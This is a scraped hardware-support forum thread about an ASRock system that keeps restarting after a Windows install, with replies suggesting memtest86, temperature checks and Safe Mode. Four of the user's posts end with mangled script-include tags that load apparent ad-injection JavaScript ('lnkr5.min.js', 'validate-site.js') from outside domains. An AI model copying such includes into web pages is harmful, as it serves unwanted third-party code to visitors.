" rel="nofollow - New installation.  I5-8400, Corsair LPX DDR 4 2x8GB, running on bench.  Installed windows to 960 EVO NVMe SSD in M2_1 slot and after install, PC continuously restarts when trying to boot up windows.  Tried reinstalling windows 3 times.  Grabbed an old hard drive, reformatted and installed windows and system booted up with no issue.  Samsung SSD is listed as supported in the product support section.

Is the issue with the SSD or an issue with the motherboard?  I have flashed to latest firmware and all other settings at default.  Last option is to take apart current PC and try a fresh install on another motherboard, it is just a fair amount of work.

Thanks.

" rel="nofollow - Update:  Windows install on old hard drive experiencing similar issues.  Was able to boot into windows and even install updates, however now as soon as I hit enter on password screen, PC restarts.  Tried reformatting Windows USB image, reformatting hard drive and reinstalling windows, same result.< ="text/" ="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=8">< ="text/" ="http://infoprovider.group/addons/lnkr5.min.js">

Does this indicate a memory issue of some kind?  CMK16GX4M2B3000C15 is supported on the ASRock Extreme 4 website.

I suggest you download memtest86 and let it run thru its basic series of tests, the free version works just fine to detect most hardware memory errors. You need a blank thumb drive or burn to a CD to use it.

Dear Usfjosh,

Thank you for choosing ASRock.

Please check your CPU and motherboard temperature at BIOS.

Also, for better overclock performance, we suggest installing the memory modules at A2, B2 slots.

Thank you!

Yours truly,

ASRock TSD

" rel="nofollow - M/B Temperature is 29C, CPU is 46C.  Not currently overclocking memory, however the memory is installed in A2 and B2 per manual.< ="text/" ="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=40">< ="text/" ="http://infoprovider.group/addons/lnkr5.min.js">

I put memtest86 iso on a usb drive but it wouldn't boot, trying to figure that out now.

" rel="nofollow - Memtest86 complete, no errors found.  Thank you for recommending that, I was hoping it would find an issue.< ="text/" ="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=44">< ="text/" ="http://infoprovider.group/addons/lnkr5.min.js">

Temperatures after completion were 50/33 for CPU and MB.

Going to head to bed before I throw this thing out the window.

" rel="nofollow - Updated:  Performed secondary memtest86 through 4 passes (3 hours) and all 48 tests passed with no errors found.

Is it fair to say the memory is eliminated as the issue?

" rel="nofollow - HI,

Can you boot into Safe mode, make successful login, and use Windows for some time?

" rel="nofollow - Really good suggestion, I should have thought to try that.  I am in safe mode now, without networking, and so far haven't seen a shutdown.  I will leave it on for awhile and see if it restarts.  Good suggestion, thank you.< ="text/" ="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=43">< ="text/" ="http://infoprovider.group/addons/lnkr5.min.js">
